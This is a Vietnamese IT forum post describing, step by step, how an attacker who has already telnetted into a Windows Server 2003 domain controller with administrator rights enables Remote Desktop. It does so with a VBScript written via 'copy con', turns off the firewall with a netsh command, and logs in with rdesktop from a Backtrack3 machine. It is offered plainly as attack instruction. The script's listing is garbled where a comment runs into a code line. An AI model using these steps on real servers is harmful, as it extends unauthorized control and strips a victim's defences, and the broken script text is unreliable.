Chia Sẽ Kinh Nghiệm Về IT



Tìm Kiếm Với Google
-


Gởi Ðề Tài Mới  Gửi trả lời
 
Công Cụ Xếp Bài
Tuổi 01-07-2011, 02:40 PM   #1
hoctinhoc
Guest
 
Trả Lời: n/a
Bật tính năng remote desktop từ xa
BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA



Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.
Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3
B1. Trên Server kiểm tra remote desktop chưa bật.




B2. Trên máy Attacker, telnet vào Server

B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop

Nội dung file VBScript remote.vbs

machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ‘ 0=off, 1=on set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )
for each item in items
item.SetAllowTSConnections( value_to_set )
next
B4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.

B5. Dùng lệnh dir kiểm tra

B6. Chạy file remote.vbs để bật remote desktop.

B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)

B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật

B9. Tắt firewall của Server
Sử dụng lệnh : Netsh firewall set opmode disable

B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.
Sử dụng lệnh rdesktop [hostname]

B11. Nhập username/password của Administrator

B12. Truy cập thành công với quyền Administrators





Theo: Dao Duy Hieu


  Trả lời ngay kèm theo trích dẫn này
Gửi trả lời


Công Cụ
Xếp Bài

Quyền Hạn Của Bạn
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Mở
Hình Cảm xúc đang Mở
[IMG] đang Mở
Mã HTML đang Tắt




Bây giờ là 03:12 AM. Giờ GMT +7



Diễn đàn tin học QuantriNet
quantrinet.com | quantrimang.co.cc
Founded by Trương Văn Phương | Developed by QuantriNet's members.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.